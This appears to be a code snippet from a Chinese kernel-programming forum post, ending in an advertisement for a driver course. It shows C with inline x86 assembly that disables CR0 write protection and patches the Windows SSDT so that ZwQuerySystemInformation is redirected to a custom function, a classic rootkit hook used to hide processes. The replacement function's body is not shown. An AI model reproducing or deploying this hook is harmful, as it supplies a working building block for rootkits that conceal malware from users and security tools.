///////////////声明Native API///////////////////////////////////////
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
/////////////////定义ntoskrnl.exe的服务表结构////////////////////////////////////////////////
typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
////////////////////定义所用到的全局变量///////////////
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
unsigned long OldCr0;
UNICODE_STRING DeviceNameString;
UNICODE_STRING LinkDeviceNameString;
//////////////////////Hook ZwQuerySystemInformation/////////////////////////////////////////////////
_asm{
cli;
mov eax,cr0
mov OldCr0,eax
and eax,0fffeffffh //cr0位16:WP 写保护(CR0 的第16 位)。置1 则禁止管理级程序写用户级的只读页,置0 则允许管理级程序写用户级的只读页。这个标志是用来在创建(forking)一个新进程时协助实现写时复制(COW——copy on write)
//的,在UNIX 操作系统中就是如此。
mov cr0,eax
}
_asm{
mov ecx, dword ptr [ZwQuerySystemInformation];
mov edx, [ecx+1];
mov eax, dword ptr [KeServiceDescriptorTable];
mov esi, [eax];
mov edx, [esi+edx*4];
mov dword ptr [OldZwQuerySystemInformation], edx
mov ecx, [ecx+1]
mov eax, [eax]
mov dword ptr [eax+ecx*4], offset MyZwQuerySystemInformation;
}
_asm
{
mov eax,OldCr0
mov cr0,eax
sti;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
